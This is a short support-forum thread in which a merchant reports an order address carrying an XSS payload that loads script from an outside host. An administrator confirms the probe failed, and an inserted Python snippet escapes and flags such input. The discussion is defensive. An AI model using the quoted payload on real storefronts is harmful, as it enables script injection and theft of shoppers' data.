Kryptronic Software Support Forum


#1 10-11-2017 07:38:42

sdn
Member
From: UK
Registered: 05-29-2007
Posts: 882

Possible XSS Attack on K902

We have received an order from a customer whose card address details are not a match. That in itself is not a great surprise but we had this additional data in the first line of their address.

24 Cyprus RD"><sCrIpT/sRc=//xss.tv/9u></sCrIpT>

Googling <sCrIpT/sRc=//xss.tv/9u></sCrIpT> I got a bunch of results some of which are about Cross-site Scripting (XSS).

The customer address is in Ohio, USA but the IP 36.4.133.82 is in China. Looks very suspect.

What do you make of it? Is K902 hardened against this sort of attack?

Not sure if it's related to the other post I made today concerning IP addresses for device authorisation emails. The order preceded the email by about 27 hours so it may be unrelated but no way of knowing.

Last edited by sdn (10-11-2017 08:06:45)


Simon


#2 10-11-2017 08:55:35

webmaster
Administrator
From: York, PA
Registered: 04-20-2001
Posts: 19861

Re: Possible XSS Attack on K902

That looks like an attempted XSS attack. As you can see the software properly accepted and sanitized everything and used the customer input as required. K9 is hardened against this type of attack, as evidenced by what you're seeing right there - an XSS attempt with no XSS execution. The order is definitely bogus, so cancel it. I seriously doubt this is at all related to the device authorization issue reported in your other thread. This was somebody testing your system for a vulnerability in an attempt to exploit it. And they were unsuccessful, but likely have stolen card info from some poor soul in Ohio if you accept cards in real time and their payment was processed.


Nick Hendler
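The two defensive steps described above (escape the submitted field on output so the markup is shown rather than executed, and flag it for order review), as an added example that is not Kryptronic's own code. The sample lines are constructed from the payload quoted in the thread; the function names and the review heuristics are my own.

```python
import html
import re

# Constructed sample data: the first line is the payload quoted in the thread,
# the second is an ordinary address line for comparison.
SUSPECT_LINE = '24 Cyprus RD"><sCrIpT/sRc=//xss.tv/9u></sCrIpT>'
NORMAL_LINE = '24 Cyprus Rd'

# Opening or closing <script> tag, regardless of letter case and of the "/"
# the submitter used in place of whitespace after the tag name.
_SCRIPT_TAG = re.compile(r'<\s*/?\s*script(?=[\s/>])', re.IGNORECASE)
# Anything that parses as a tag: "<" optionally followed by "/" then a letter.
# "<3" in a street name does not match, so plain text is not flagged.
_TAG_LIKE = re.compile(r'<\s*/?[a-z]', re.IGNORECASE)


def render_address_line(value: str) -> str:
    """Escape an address line for insertion into an HTML body or attribute.

    html.escape() turns <, >, &, " and ' into entities, so the browser shows
    the submitted text literally instead of parsing it as markup.
    """
    return html.escape(value, quote=True)


def review_flags(value: str) -> list:
    """Heuristic flags for order review. Run this on the full stored field,
    not on the order e-mail, which may truncate the value."""
    flags = []
    if _SCRIPT_TAG.search(value):
        flags.append('script-tag')
    elif _TAG_LIKE.search(value):
        flags.append('tag-like')
    # A quote followed by ">" is the classic way to break out of an attribute.
    if '">' in value or "'>" in value:
        flags.append('attribute-breakout')
    return flags


if __name__ == '__main__':
    for line in (SUSPECT_LINE, NORMAL_LINE):
        print(repr(render_address_line(line)), review_flags(line))
```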


#3 10-11-2017 09:15:18

sdn
Member
From: UK
Registered: 05-29-2007
Posts: 882

Re: Possible XSS Attack on K902

Thanks for the confirmation. The order and card authorisation have already been cancelled as, even before seeing the XSS info (which was truncated in the order email), it looked suspect and the Gmail address used bounced.

It is the poor online retailer who takes the hit if there is a chargeback, not the cardholder or the bank. If we get stung, we not only lose the value of the goods sent but, to add insult to injury, our merchant services provider then charges us £50 for handling the chargeback. And they don't refund their card fees either. So we take all the risk and the bank wins whatever...

Last edited by sdn (10-12-2017 04:29:14)


Simon

